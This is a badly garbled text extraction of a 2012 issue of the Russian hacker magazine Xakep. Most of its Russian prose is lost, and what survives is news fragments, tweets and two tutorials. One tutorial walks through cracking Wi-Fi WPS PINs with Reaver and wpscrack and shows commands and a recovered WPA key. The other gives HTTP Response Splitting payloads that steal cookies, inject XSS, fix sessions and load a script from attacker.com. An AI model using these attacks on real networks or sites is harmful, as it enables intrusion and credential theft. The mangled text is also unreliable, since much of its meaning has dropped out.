Хакер 2012 03 PDF

GOOGLE CHROME
088
WWW.XAKEP.RU
03 (158) 2012
W3AF
: 230 .

WI-FI
018
WPS,
, .
5-10
WPA-.
024
082
124

HTTP RESPONSE SPLITTING

WINDOWS PHONE 7.5?
HIGHLOAD-
NGINX DJANGO
Intro
3 768
nikitozz (nikitoz@real.xakep.ru)
step (step@real.xakep.ru)
gorl (gorlum@real.xakep.ru)

PC_ZONE UNITS
UNIXOID SYN/ACK
MALWARE
PR-

step (step@real.xakep.ru)
(magg@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
Dr. Klouniz (alexander@real.xakep.ru)
gorl (gorlum@real.xakep.ru)
(grigorieva@glc.ru)

DVD

Unix-
Security-

ant (ant@real.xakep.ru)
Andrushock (andrushock@real.xakep.ru)
D1g1 (evdokimovds@gmail.com)

ART
-
(alik@glc.ru)

PUBLISHING
, 115280, ,
. ,19, , 5 , 21. .: (495) 935-7034, : (495) 545-0906

,
- .
,
.
,
~50
WINLINK.
,
.
,
, ,
3 768
, . : 250 , 50 , 1.2
. ,
,
, , : .
,
.
, (5 ) ,
, , 30 ! ,
!
: :).
P.S.
. :).
nikitozz, . .
shop.glc.ru/xakep
vkontakte.ru/xakep_mag
03/158/ 2012

.: (495) 935-7034, : (495) 545-0906

TECHNOLOGY

(filatova@glc.ru)
(olgaeml@glc.ru)
(alekhina@glc.ru)
(polikarpova@glc.ru)
( )
(tatarenkova@glc.ru)
(gospodinova@glc.ru)

(dubrovskaya@glc.ru)
-
(bulanova@glc.ru)
(korenfeld@glc.ru)

(kosheleva@glc.ru)
(lepikova@glc.ru)
(lukicheva@glc.ru)
:
DVD-: claim@glc.ru.

: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
,
77-11802 14.02.2002.
Scanweb, . 219 833 .
.
. ,
, . .
.

: content@glc.ru.
, , 2012
001
Content
008
HEADER
004
011
MEGANEWS

hacker tweets
-
14

QR-
016
017

Proof-of-concept
: Pastebin.com
COVERSTORY
030
COVERSTORY
COVERSTORY
018
024
Wi-Fi
10
WPA Wi-Fi

WPS
048
070
PCZONE
038
042
048
?
-

CAPTCHA

-
w3af
UNIXOID
104
108
110
052
056
062
066
070
074
Easy-Hack

PHP- Windows

I can crack it!
-,

SMS: 30 !

X-Tools

SYN/ACK
114
120
124
076
082

2011

130
138
094
096
100
Google Chrome

Google

/++

,

!
USB 3.0
Edifier R2500
2.0
WEXLER.BOOK T7055
, ,

140
143
144
088

nginx Django
FERRUM
136
MALWARE

Linux-

-
Fedora

Linux
110
FAQ UNITED
FAQ
8.5
WWW2
web-
MEGANEWS
WPS

WPS (Wi-Fi
Protected Setup)
,
US-CERT.
,
D-Link, Netgear, Linksys Buffalo.
,
PIN-,

.

PIN, ,

, Wi-Fi .
US-CERT :
PIN-
,
EAP-NACK .

, ,
PIN- .
, PIN-.

,
:
10^8 10^3 + 10^4, 11 .

Cover Story .
,
,

,
.

,

WPS.

( YOTA)

LTE .
63
,
150.
004
USB 3.0
, ,
. CES ,
2012 2013 .
LINUX MANDRIVA,

NGI,
.
,
.
GOOGLE
. British
Telecom
.
, APT-,

Sykipot, , ,
-, .
, -

.
Sykipot AlienVault.
ActivIdentity ActivClient,
-, .

PIN-, .
AlienVault ,
2011 ,
.

PIN-. Sykipot
.
, , ,
.
WINDOWS PHONE
MARKETPLACE
50 .
14
(Android Market
19).
IPHONE DEV-TEAM,
-,
iOS 5.01
iPhone 4S iPad 2.

.
03 /158/ 2012
MEGANEWS
23% - NAND Apple.
,
- ?
SOPA
PIPA
RAZER
:
10,1
1280 x
800 ,
Dolby
7.1 (
THX),
Wi-Fi 802.11b/g/n
Bluetooth 3.0.

.
Razer ( )
. , , Razer.
Project Fiona ,
CES 2012.
, , , .
(
) . , . , Project Fiona
Intel Core i7 . , Intel.
,
-
. , , . Razer . ,
.
$1000.
- .
ZAPPOS.COM 24
,

006

SOPA (Stop Online Piracy Act) PIPA
(PROTECT Intellectual Property Act),
, .
, , : (,
, .)
( )
.
,
. .

. , ,
, ,
.

, . , ,
. , , MPAA, RIAA
BSA ( Microsoft, Apple, Adobe,
Intel . .). Google, Twitter, Mozilla,
Facebook, Yahoo, eBay . X,
,
.
, ,
.
,

. Reddit . Google
. WordPress. blackout
.
SOPA. ,
GoDaddy, SOPA, -: GoDaddy.
,
TechCrunch , GoDaddy
- SOPA... ,
.

BSA, , SOPA . ,
, ,
.
SOPA 18
blackout,
. ? , SOPA, ,
, .
. PIPA . ? .
,
, ,
. . .
03 /158/ 2012
BUFFALO CLOUDSTATION
1
7

Buffalo

.
Windows,
MAC OS.
Time Machine.
Buffalo CloudStation
NAS.

: ,
.
BitTorrent-

iOS Android
03 /158/ 2012

(15017545 ),
,
, .
Webaccess
,
Buffalo.

,

: ,
.
Buffalo CloudStation

. ,
, ,
,
.

SATA-II
1 2 .
26 .
,
4
,
.
NAS', Buffalo
CloudStation BitTorrent-
web-.

p2p-: .
007
MEGANEWS
HMEI7 , Siemens.
QR-
MEGAUPLOAD

Megaupload, , , 4% -.
, , , .

Dotcom
. : 20 , 20
! ,
.
.
, Megaupload
. $500 .
,
( -)
$175 .
: , -
FileSonic
(, , ):
, , .
Anonymous
, , , RIAA,
MPAA , -
.

. QR,
,
.
Websense ThreatSeeker Network -,
QR-. , - .
2tag.nl , QR- URL. ,
QR-, .
QR-,
, (
QR-).
:
. ,

.
comScore, 14

18
34

QR-.

QR-
.
THUNDERBOLT
WINDOWS.
DigiTime. ( ), ,
Sony, Asus, Gigabyte Technology ASRock,
Thunderbolt .
.
008
IPV6-
2013 .
2015 IPv6

.
ANDROIDINVASION
GOOGLE , Google

.
03 /158/ 2012
,
GROUP-IB,
.
, IT-:
, Linux.
):
( ):
-
5

"
,
"
:

,
e,
Ariadn
.
, (
Group-IB) :

,
. , ,
:
iPad 2 Wi-Fi 3G 16 Gb.
,

.
:

.
!

:
www.xakep.ru/post/58241/
!
!
MEGANEWS
FACEBOOK Windows,

SAMSUNG PLS-
-
CES 2012
. CES , , , ,
.
, ,
S27B970 Samsung, 9-
-. 27-
, PLS (Plane Line
Switching). , IPS (In-Plane Switching)
Samsung. IPS-
, -
.
Samsung, , : PLS-, ,
,

, . . ,
Samsung .
S27B970 ,
(
- USB-),
.
9- 10 ,
.
QHD (2560 x 1440), DisplayPort,
Dual Link-DVI HDMI, 7 Mobile High Definition
Link (MHL)
.
Samsung Natural Color Expert,
. S27B970
,
,
- . , -
, Samsung 9
. ,
(!)
. -, ,
.
, (
),
. , .
, PLS
,
,
: PLS-
.
, ( , ,
). S27B970
$1199.
: 2560 1440
: 1,07
: 300 /2
(.): 90%
():
1000:1
(GTG): 5
(/.): 178/178
APPLE SAMSUNG
ELECTRONICS ,
GALAXY TAB 10.1
(!)
010
03 /158/ 2012
#hacker tweets
@NeckbeardHacker:
linux.js. ,
JavaScript-
Linux.
?
@cBekrar:
Chrome ASLR + DEP +

10 ? . #pwn2own
:
Vupen
PWN2OWN.
,
...
@meder:
: CVE-2011-3923.

Struts2: http://bit.ly/yFjhxr.
:

,
. , , Java
, RCE- ( ,
Java ), !
...
@RolfRolles:
-:

http://bit.ly/zIqZ5K .
:
... , ,
.
PhoneAndroid:
, -: ...
bit.ly/yoLmba.
Chroot-ing Windows
, :, :, :...
http://bit.ly/yQQqmN.
:
, ...
:
;).
@_sinn3r:
PoC McAfee SaaS

0-day (ZDI-12-012):
obj.ShowReport "calc.exe".
@cBekrar:
#fail-
McAfee Security-as-a-Service,
ActiveX,
bit.ly/xbJtqP via @thezdi.
obj.ShowReport
"calc.exe". ... .
, 0-day ZDI 12 . :) ...
@martincronje:
: HTML5 !=
CSS JavaScript-
jQuery.
@i0n1c:
,
!

...
...
@mikesica:
, ,
.
@jcran:
-- irb> (1..254).each
{|x| puts "host - 10.0.0.#{x}";
`smbclient -L 10.0.0.#{x}
-Uguest -N`}.
:
@f0rki:
PHP :
perchance (condition) { // Code
here } otherwise { // Code here }.
@garethheyes:
XSS- : <xml
ID=xss><x><IMG src=1
onerror=alert(1)></x></
xml><SPAN DATASRC=#xss DATAFLD=$Text
DATAFORMATAS=HTML></SPAN>.
Ruby- ...
@roman_soft:
@stephenfewer:

'Frinder' http://bit.ly/xrUBiW.
03 /158/ 2012
@Ivanlef0u:
BinScope:
http://bit.ly/yzcQYR .

NX, SafeSEH, /dynamicbase, . .
011
MEGANEWS

(CSDN).

,
,

,

- .
,

.
, (,
, ). ,
,
, . ,

, .
: ,
.
. !
. . :) , ,
.
. , . , , -
, , ,
.
: webpolit.livejournal.com/72397.html.

Seagate

Samsung .

$1,375 .
012
NGINX
,
Microsoft IIS. NetCraft,
Apache
(57,93 %).
THE PIRATE BAY

TORRENT- magnet. magnet-URL

.
BSOD WINDOWS 7

Windows 7 x64
w3bd3vil.
win32k.sys
( Win XP),
. , 32-
, 64-
- BSOD,
.
: ,
, ,
. , HTML-. Safari ,
.
iframe
. 64-
Windows 7, , ,
.
.
TORRENTFREAK , Crysis 2

BitTorrent PC
2011 . Call
of Duty: Modern Warfare 3
Battlefield 3.

Twitter

Google . Google .
03 /158/ 2012
GOOGLE MOZILLA Firefox.
MICROSOFT,
ARM-
.
, EDIFIER
Microsoft
,
. , .
2011- Microsoft ,
Windows 8 Secure boot (

UEFI). : UEFI
. , , , UEFI. ,
. Linux-
,
Linux ,
- Linux Windows 8
.
Microsoft ,
Linux ,
, . ,
Windows,

. ,
.
Microsoft ,
Windows 8. , ,
. .
, Windows 8 ,
116: , ARM, Secure Boot
.
Secure Boot , Pkpriv.
Secure Boot UEFI
,
.
, Microsoft ,
Secure Boot,
, ARM-. , ARM,

.
Linux ( ) . ,
, Windows 8,
Linux .
: ?
, .
,
. ,
UEFI, .
, , Microsoft
, Linux, Android ARM-.
Edifier
. 2.0.
- R1500TM ,
. Edifier
( ), -
18- . ,
RCA, , .
R900T.
2.0-, 4-
- 13-
, ,
. R900T
: 140 226 197 .
3,5-
RCA RCA RCA,
, , .

:
Edifier

12
.
.

.
MEGASEARCH.CC

,

03 /158/ 2012
013
MEGANEWS
SECURITY RESEARCH LABS GSM. .
!
,

PWN2OWN

Pwn2Own,

,
(,
) . ,

. Microsoft
Internet Explorer, Apple Safari,
Google Chrome Mozilla
Firefox Windows 7 Mac OS Lion
( ).

.
Hewlett-Packard.
60 , 30
15
, .
Google
Chrome. 20 sandbox-
Chrome. 10
sandbox- Chrome,
.
,
Pwn2Own. , .
.
,
.
Pwn2Own 7 9 . , !
D- , .
( ,
iModela)
,
, .

, , .
, .
-
The Pirate Bay
3D-, -
.
- ,
.

Warhammer 40 - 1970 .
, , 3D- .
,
!
, ,
. ,
.

3D-
RepRap

,
.

Mendel,

(
).

$520.
SONY
XQD.

, .
\
XQD
1 / (125 /).
.
QD-H16 16
$130, QD-H32 32 $230.

.
014

FACEBOOK HACKERCUP,
.
- Facebook,

.
TIOBE SOFTWARE
OBJECTIVE-C
.

-
Java, C,
C# C++.
03 /158/ 2012
SYMANTEC

Symantec,

,
, . Symantec,
, 2006 .
, .
, Norton Antivirus Corporate Edition, Norton
Internet Security, Norton SystemWorks pcAnywhere 12.0,
12.1 12.5. ,
Yama Tough, ,
Lord of Dharmaraja, ,
Norton Utilities.
,
,
Norton Antivirus. , ,
1999 . , Symantec ,

. .
,
. ,
Symantec ( ).
,
, ,
. Symantec
,
scareware-, , .
Symantec,
, , .
, ,
.

LUMINANT MEDIA
93-

ANONYMOUS
03 /158/ 2012
015
HEADER

.

.

KeyPass (keepass.info),
.
,
, . ,
,
? :)
, ,
, KeyPass,

, !
.

1Password (agilebits.com/onepassword), Mac,
Windows.
, $69.99

. , . , -,

LastPass (lastpass.com),
. ,
. -,
(Windows, Linux, Mac),
.
(Firefox, Internet Explorer, Chrome, Safari,
Opera). ($1 )

. -, LastPass
,
,
.
- ,
.
- ,
. -, LastPass ,

016

Dropbox.
- ( ),

. ! :)
LASTPASS
, LastPass, .
, .
LastPass ,
. , Sesame

-.

. -,
Sesame .

, ,
-. !
LastPass
Sesame ( ), ,
, .
Google

Yubikey $25
(store.yubico.com), Google. ,

(Google Authenticator),
.
Gmail,
LastPass.
(helpdesk.lastpass.com/security-options/
google-authenticator).
,
.
$12
.
LastPass
LastPass

,
, . LastPass

, ( 123456). ,
,
.
03 /158/ 2012
Proof-of-Concept

PASTEBIN.COM

- Pastebin.com.
,
,

. .
, .
Lulzsec
( , ) Pastebin.com.
. (pastebin.
com/trends) , :
- Facebook;
- , e-mail
;
IP-
.
:
.
. .
, , ,
.
, , Pastebin.
com, :
Pastie, FrubarPaste, YourPaste, Codepad, Slexy
LodgeIt. PoC
. ,
,

.

, , .
: , malc0de (bit.ly/An58Yd)
NeonTempest (bit.ly/zRuK7o). , ,
PastyCake 9b+ (bit.ly/xHXdfH),
.

Pastebin.com Pastie.org ,
.
SQLite.

MongoDB MySQL. -
Python, :
python gather.py -k kwords -o urls.db \
-a ~pastycake@gmail.com~ harvest
'harvest'
.
e-mail.
-o
. -k
,
. , ,
, . ,

, , .
,
PastyCake, , :
DEFAULT_KEYWORDS = [
'password',
'hack',
]
,
, .
.

, ,

.
, Twitter- PastebinLeaks (twitter.com/#!/
PastebinLeaks), -
Possible Massive mail/pass leak
http://pastebin.com/L6YbD136
Possible listing of http passwords
http://pastebin.com/qZbccMB7
Possible Juniper configuration with
password http://pastebin.com/9vuwzjnS
..
Python
03 /158/ 2012
Trending Pastes ?
,
. z
017
COVERSTORY
(ivinside.blogspot.com)
WPA-
WI-FI
WPS
018
03 /158/ 2012
HOWTO: Wi-Fi 10
HOWTO:
WI-FI
10
, ,
WPA2, .
. - ,
, GPU. ,
,
WPS.
03 /158/ 2012
WWW
WARNING
,

Google
Docs:
goo.gl/3zjfP

.
.
019
COVERSTORY
PIN- bruteforce. .
WPS
PIN- WPS
1. PIN- WPS,

,
,
. ,
.
,
,
,
.
, ,
.
/
. ,

.
WPS (Wi-Fi Protected Setup).

,
, - WPA-.
PIN,
, !
. WPS.
. ,
WPS (, ,
), PIN
!
2. PIN- WPS

() (),
.
.
2. PIN- -.
PIN- ,
( 1),
.
,
.
3. PIN- ( 2).
WPS,

,
PIN-. .
.
! ,
, PIN-
,
10^8 (100 000 000) . . ,
PIN- , .
10^7 (10 000 000) .
! WPS (
3). , ,
. , PIN-
.
, ! :
1. M4 EAP-NACK,
, PIN-
.
2. EAP-NACK M6, , ,
PIN- . 10^4 (10 000)
10^3 (1
000) .
11 000 .
, ,
.
3.
. WPS-:

WPS?
WPS .
.
, -
.
(, ):
PIN, . ,
(Cisco/Linksys,
Netgear, D-Link, Belkin, Buffalo, ZyXEL)
WPS. .

WPS:
1. Push-Button-Connect (PBC).
020
3. WPS
03 /158/ 2012
HOWTO: Wi-Fi 10
, .

-, M3.
,
,

. ,

,
.

wpscrack (goo.gl/9wABj), Python.
Scapy, .
Linux-,

.

, MAC- , MAC-
(SSID).
$ ./wpscrack.py --iface mon0 \
--client 94:0c:6d:88:00:00 \
--bssid f4:ec:38:cf:00:00 --ssid testap -v
sniffer started
trying 00000000
attempt took 0.95 seconds
trying 00010009
<...>
trying 18660005
trying 18670004
# found 1st half of
PIN
trying 18670011
<...>
trying 18674095
# found 2st half of
PIN
<...>
Network Key:
really_really_long_wpa_passphrase_good_
luck_cracking_this_one
<...>
,
PIN-, ,

. ,
,
(61 )
.
, wpscrack
,
:

Tactical Network Solutions. ,
PoC ,
Reaver (code.google.com/p/reaver-wps).

WPS-PIN PSK-, ,

.

.
,

WPS .
HOW-TO
, Linux.
, Reaver BackTrack
(backtrack-linux.org),
-
- WI-FI
1. WEP (Wired Equivalent Privacy)
.

,
RC4.
airodump-ng
aircrack-ng, .
wesside-ng,
WEP
.
2. WPA/WPA2 (Wireless Protected Access)
-
03 /158/ 2012
WPA/WPA2 (

WPA Handshake,
). ,
. , ,
, NVIDIA
CUDA ATI Stream
GPU. aircrack-ng ( ),
cowpatty ( ), pyrit
( ).
4. - PIN- WPS
.
.
0.
BackTrack 5 R1
VMware
ISO. .
,
UNetbootin (unetbootin.
sourceforge.net) :
, ,
, .
1.

root:toor. ,
(
BackTrack GNOME, c KDE):
# startx
2. Reaver
Reaver,
.

(Applications Internet Wicd Network
Manager). ,
:
# apt-get update
# apt-get install reaver
, 1.3,
. , ,

021
COVERSTORY
, , SVN. , ,
(
).
$ svn checkout http://reaver-wps.
googlecode.com/svn/trunk/ reaver-wps
$ cd ./reaver-wps/src/
$ ./configure
$ make
# make install
BackTrack
.
Arch Linux, ,
, PKGBUILD:
$ yaourt -S reaver-wps-svn
3.
Reaver :

;
;
MAC- (BSSID);
, WPS.
,
:
# iwconfig
( wlan0) ,
( ,
Reaver, ).
:
# airmon-ng start wlan0
,
(
mon0).
BSSID.

airodump-ng:
# airodump-ng mon0

.
WPA/WPA2
PSK. ,
.
,
kismet,
. ,
WPS. Reaver (
SVN) wash:
# ./wash -i mon0

, .
-f cap-, ,
, airodump-ng.
Reaver BackTrack wash. ,
.
4.

PIN. Reaver
.
(
) BSSID
:
6. Reaver Pro Reaver
# reaver -i mon0 -b 00:21:29:74:67:50

-vv
-vv
, ,
.
Reaver v1.4 WiFi Protected Setup Attack
Tool
Copyright (c) 2011, Tactical Network
Solutions, Craig Heffner <cheffner@
tacnetsol.com>
[+] Waiting for beacon from
00:21:29:74:67:50
[+] Associated with 00:21:29:74:67:50
(ESSID: linksys)
[+] Trying pin 63979978
PIN , ,
, .
. ,
PIN,
. , :
[+] Trying pin 64637129
[+] Key cracked in 13654 seconds
[+] WPS PIN: '64637129'
[+] WPA PSK: 'MyH0rseThink$YouStol3HisCa
rrot!'
[+] AP SSID: 'linksys'
, ,
WPA-PSK, . ,
.
5. c Reaver
022

WPS . , ,
.
, , ,
, . ,
,
. ,
WPS
PIN-,
90 . ,

,
? z
03 /158/ 2012
HOWTO: Wi-Fi 10
FAQ

?
,
A ,
.
Aircrack-ng (bit.ly/wifi_
adapter_list). ,
,

RTL8187L. USB
$20.

"timeout" "out of order"?
-
A
. ,
WPS.
Reaver
, WEP
?
WEP
A
,
(IV),
. ,
- , -
.
WPS

Reaver
PIN-. -
,
,
WPS-. WPS

. ,
,
,
.

ALFA Network
dBi, ,

.

MAC-?
, MAC A mon0,
.
, , wlan0.
Q
A
Reaver
PIN, ?
,
WPS. -
wash: ,
.

Q ?
-
A ,
.

"rate limiting detected"?
,
A WPS.
(
),
(
).
Reaver
1.3, -
.
'--ignore-locks'
SVN.

Reaver
?
,
A ,
,

REAVER
HOWTO
Reaver. WPS
,
. ,
.
5. WPS
, , . Reaver
315 ,
:
# reaver -i mon0 -b 00:01:02:03:04:05 --lock-delay=250
1. SSID :
# reaver -i mon0 -b 00:01:02:03:04:05 -c 11 -e linksys
2. '--dh-small',
,
:
# reaver -i mon0 -b 00:01:02:03:04:05 -vv --dh-small
3. .
:
# reaver -i mon0 -b 00:01:02:03:04:05 -t 2
6. WPS
PIN-,
. Reaver ,
'--nack':
# reaver -i mon0 -b 00:01:02:03:04:05 --nack
7. '--eap-terminate' ,
WPS- EAP FAIL:
# reaver -i mon0 -b 00:01:02:03:04:05 --eap-terminate
4. .
:
8. WPS- ,
PIN-,
. Reaver ,
'--fail-wait':
# reaver -i mon0 -b 00:01:02:03:04:05 -d 0
# reaver -i mon0 -b 00:01:02:03:04:05 --fail-wait=360
03 /158/ 2012
023
COVERSTORY
d0znpp (ONsec, http://oxod.ru)
DVD

.

, 2002

HTTP- ,
,

.

,

PHP.
024
WWW
CRLF PHP Internet Explorer 7/8/9.

%0d%0d%20 (%09)
bit.ly/ACOlSL Goodbye HTTP Response

Splitting, and thanks
for all the fish (Stefan
Esser).
bit.ly/wB9QGz

#1.
bit.ly/ABOwbr

#2.
bit.ly/aWQGqx

#3.
IE XSS
(X-XSS-Protection)
03 /158/ 2012
INTRO
: .
, . ,
-
, , , .
(, eval) ,
$_GET['aaa']. ,
. , ,
, .
? ,
- , , .
,
, ,
HTTP Response Splitting.
HTTP-. - ,
HTTP- (
).
, , HTTP-
. ,
03 /158/ 2012
HTTP-
, Cache Poisoning, Crosssite Scripting (XSS) , , Page Hijacking.
cPanel 2010 .
, header("Location:
".__).
:
http://server.com:2082/login/?user=foo&pass=bar&failurl=
%0D%0AContent-Type:%20text/html%0D%0A%0D%0A%3Cscript%3Eale
rt%28%22
Recognize-Security%20-%20%22%2Bdocument.cookie%29;%3C/
script%3E%3C!--
XSS:
HTTP/1.1 307 Moved
Server: cpsrvd/11.25
Connection: close
Content-length: 206
Location:
Content-Type: text/html
<script>alert("Recognize-Security - "+document.cookie);
</script><!-Content-type: text/html
<html><head><META HTTP-EQUIV="refresh" CONTENT="0;URL=
Content-Type: text/html
025
COVERSTORY
<script>alert("Recognize-Security "+document.cookie);
</script><!--"></head><body></body></html>
, -
header("Location: "
.$_GET['backto_url']) header("Location: /index.
php?lang=".$_GET['lang']). Open Redirect,
. ,
HTTP
Response Splitting, ,
PHP ( 2006- ) %0d%0a .
,
.
header() , , ,
.
DISCLAIMER

ZeroNights, . ,
,
, cookies.
, ,
, smuggling-,
.
PHP 4.4.2 5.1.2 ,

. , PHP
4.4.2 5.1.2,
:
HTTP
( HTTP), , HTTP-.
bit.ly/r9pLL, 6 Response (bit.ly/BEAq4).
HTTP- :
RFC-2616
Response = Status-Line; Section 6.1
*(( general-header; Section 4.5
| response-header; Section 6.2
| entity-header ) CRLF); Section 7.1
CRLF
[ message-body ]; Section 7.2
,
CRLF, . URL CRLF %0D%0A.

. ,
CRLF,
.
CRLF PHP
header() (bit.ly/wVbbcd) PHP
HTTP- . . , -
<?php
header("Location: /basic/".$_GET['redirect'].".html");
?>

Warning, :
test.php?xxx=bbb%0a%0dNew-Header:blabla
Warning: Header may not contain more than a single
header, new line detected. in test.php on line 2
,
. ,
:
/* new line safety check */
char *s = header_line, *e = header_line + header_line_
len, *p;
while (s < e && (p = memchr(s, '\n', (e - s)))) {
if (*(p + 1) == ' ' || *(p + 1) == '\t') {
s = p + 1;
continue;
}
efree(header_line);
sapi_module.sapi_error(E_WARNING, "Header may not
contain more than a single header, new line detected.");
return FAILURE;
}
,
LF ( URL- %0A). , - (%09) (%20), . ,
CRLF, LF-. RFC,
, . , RFC
? , . - :
,
Refresh-
026
<?php
header("X-Test1:1\r\n Set-cookie: is1=OK");
header("X-Test2:2\r\n\tSet-cookie: is2=OK");
echo "<script>alert(document.cookie)</script>";
?>
03 /158/ 2012
, Internet Explorer
. , - RFC
, ,
header() IE, ,
Open Redirect. .
.
header() 2006
,
.
Internet Explorer. , .
, PHP %0a (\n LF).
, - ,
.

.
:
#!/usr/bin/perl
use strict;
use warnings;
use Socket;
. . .
listen SERVER, 10;
my $answ = "HTTP/1.1 200 OK\r\n";
for($i=0;$i<256;$i++){
$answ.="Set-cookie: cook-$i=1".chr($i);
}
$answ .="\r\n\r\n<h1>Test splitting bytes</h1>";
. . .
: ,
- (, ,
) ,
CRLF (%0d%0a). -,
HTTP- ,
Set-cookie, 256 .
, - ,
, ,
<N>Set-cookie:... , ,
, , , . ,
, :-). ,

( ).
:
IE 8/9 %0d
Firefox 7 Opera %0d
Chrome %0d %00 (Issue 95992 fixed in rel. 15)
Safari %0d
, , Firefox, CR , CRLF.
,
,
- -! , ,
, 14- Google Chrome,
-
03 /158/ 2012
setcookie()
setcookie()
-. . 95992 Low (
,
, , , ).
15- - ,
, , 17-
. Firefox ,
, RFC. ,
.
XSS
header(),
.

.
client-side-: ,
.
, Content-Length,
, HTTP-.
header() PHP ContentLength 0, . ,
HTTP Response Splitting ( HTTP-)
, Content-Length .
, . , Internet Explorer,
, HTML- , Content-Length.
6- 9- .
-:
<?php
header("X-Header: aaa".$_GET['r']);
?>
Internet Explorer
HTTP-:
027
COVERSTORY
/index.php?r=foobar%0d<html>%0d<h1>TEST</h1>
. , .
XSS-,
:
/index.php?r=foobar%0d<html>%0d<script>
alert(/Splitting/)</script>
, - , . ,
,
. XSS- Internet Explorer,
9-
, , , X-XSS-Protection: 0. ,
,
.
HTTP- :
/index2.php?r=foobar%0dX-XSS-Protection:0%0d<html>%0d
<script>alert(/xss/)</script>
. IE , X-Content-Type-Options,
. . : ( Content-Length).
, header("Location: /index.php?lang=".$_GET['lang'])
Open Redirect
?lang=aaa%0dLocation:http://yandex.ru. ,
, .
( ), .
, Access-Control-Allow-Origin ,
, Opera,
Internet Explorer 8+, Firefox 3.5+, Safari 4+ Google Chrome.
(mzl.la/4srnwm).
,
Access-Control-Allow-Methods, Access-Control-AllowHeaders, Access-Control-Max-Age (
).
, , . Access-Control-AllowOrigin ,
. , , , XHR . ,
Access-Control-Allow-Origin: *
.

RFC, , ,
, , , .
Interner Explorer HTTP-.
,
, .
, Content-Length
, , RFC, HTTP
. ,
, .
, header(). , - ,
. , , : header(), setcookie() setrawcookie().
, ,
header(), $path $domain.
,
. ,
. .
,
header():

, ContentLength, , HTTP-
.
, , X-XSS-Protection,
XSS- Internet Explorer,
if (name && strpbrk(name, "=,; \t\r\n\013\014") != NULL)

{
/* man isspace for \013 and \014 */
zend_error( E_WARNING, "Cookie names can not contain
any of the following'=,; \\t\\r\\n\\013\\014'" );

1. X-Frame-Options. ,

iframe/frame-.
X-Frame-Options:
allow-from attacker.
2. X-Content-Security-Policy.
,
. ,
X-Content-SecurityPolicy: allow 'self', <script src="http://attacker.com/1.js"><script>
. ,
X-
028
Content-Security-Policy: allow http://*:80.

3. Refresh. Refresh.
HTML data Open-redirect: Refresh: 1,data:text/
html,<h1>OK</h1>. Chrome
script. , ,
,
data-,
XSS.
4. Set-cookie.
.
,
( )
,
, ,

.
: foobar:%0dSetCookie:PHPSESSID=FAKED%0dLocation=/
auth.php. ,
,
.
99 % -
Session Fixation (
).
03 /158/ 2012
IE HTML- Content-Length,
return FAILURE;
}
if (!url_encode && value && strpbrk(value,
",; \t\r\n\013\014") != NULL) {
/* man isspace for \013 and \014 */
zend_error( E_WARNING, "Cookie values can not contain
any of the following',; \\t\\r\\n\\013\\014'" );
return FAILURE;
}
strpbrk() ,
. ,

.
.
(, ) strpbrk (php.su/functions/?strpbrk),
. , ,
- ! , PHP
,
- ,
. - .
, . ,
, = .
( 2010
).
COOKIES
- , ,
. setcookie() setrawcookie()
.
. , .
,
, .
, .

,
, .
, , :
<?php
setcookie("param0","PREFIX_".$_GET['p0']);
?>
4096 . , .
! ,
, .
Session Fixation.

:
03 /158/ 2012
XSS- IE
chrome 4096
safari 4091-LEN(cookie_name)
opera 4096
firefox 4096
iexplore 5116-LEN(cookie_name)

, RFC: www.ietf.org/rfc/rfc2109.txt.
RFC at least
20 cookies per unique host or domain name. , 20 20
. . , 1997-
, ,
, .
, RFC, ,
, , .
:
chrome 180
safari ~2800/LEN(cookie_name+cookie_val)
opera 60
firefox 149
iexplore 49
, 20, - 10000 :-). ,

Opera Chrome,
.
,
. ... . PoC Opera Chrome .
, (N+1)- ?
- . , ? ? , ,
. ? , !
Opera Chrome!
,
, , , ,
. , . , ,
. ,
(Chrome, Opera).
OUTRO

, .
,
HTTP Response Splitting, . ,
.
(oxod.ru).
! z
029
COVER STORY
rabota.ru,
.Ru.
@Mail

il.Ru Group.
- Ma

PRUFFI.
030
03 /158/ 2012

.
, ,
. ,
.
. ,
.
, , .
, .

, Gmail -
.
, ,
Google. :)

, . ,
PRUFFI .

. 5060
, .

800 .
PRUFFI 60 000 90 000 . . :)
PRUFFI FRIENDS

- .

?
, .
, ,
15
:
, .
,
.
.

PRUFFI Friends (apps.facebook.com/pruffi_
03 /158/ 2012
friends). , . ,

.
,
:
,
.

.

.
,
. ,
800 ,
?
,
?
.
. , , .

. ,
.

, .

. , ,
,
. -
,
,
1000 .
.

.
, ,
.
PRUFFI .
: 400
. 600 .
- : , - 700
1,5 .
,
(pruffi.
ru/analitika). , , 3040 % , . ? .
, Ruby
100
, ,
.
Ruby- 60 ,
, .
,
.
?

!
, IT .

, .
,
20 , !. ,
.
, ,

.
, (Product Manager'),
, 30. ? ,
. ,

. :) :
,
( ), . ,
. .
,
.
031
COVER STORY
-, :
,
.
- !
. HR-: ,
.
. ,
. :)
. .
. .
, ,
.
Facebook Google,
Foursquare, LinkedIn
. , ,
LinkedIn, - , Groupon.
! ,

.
, . ,

, .
( -)
, ,
. Zynga
, .
Zynga,
, .
.
PRUFFI
.
.
: $500 000
$500 000.
.
,
,
: ,
,
.
!

. ,
,
.
,
, ,
( /IT,
, , ). ,
, , ,
,
.
, .
032
.
. , ,
, -,

. .

? , , -,
,
(iOS,
Android, Symbian, Windows
Phone), .
.
.
.
:
PM (Product manager),
, PM,
. , ,
. :
, ,
. :

,
,
.
. , Omlet.ru,
Enter.ru . . .

.
, .
, . ,
.
. , , ,
,
.

Ostrovok.ru.
.

,
, .
, ,
. , , .
,
:
.
,
200 000 .
. , , ,
180200 .
100120
.
, - 140
. .

.
,
,
. . .
. ,
,
,
.
.
.
, , .
.
, PM
. ,

,
. . ,
. ,
-
, .
, ,

. :) ,

,
Molotok.ru,
Mail.ru.

:
1. Ruby 86 %,
40 %.
2. , , , .
3. .
4. , e-commerce,
50 %.
.
iOS Android. ,

-
03 /158/ 2012
.

, .

.
, ,
, ,
.
.

, .
, ,

. , - .

. ,
.
,

. :
,
.
, . Mail.ru :

, ,
.
,
.
, Mail.ru Group
. ,

. Futubra (futubra.com).

.
:
.

. .
, .
.
.
.
PHP-
Perl-.
Perl, , , . , Ruby,
Perl ,
C++ Java.
. . .
NDA (Non-disclosure
agreement ).

.
: ,
. - .
, . ,
- .
. . , Mail.ru,
, , .
, .
,
, -
. , . ,
- .

. , .
-
03 /158/ 2012
. ,
.
. ,
.
: .,
,
, .
, ,
Ruby. , .
: ,
HR-, , ? .
, .
,
,
. .
,
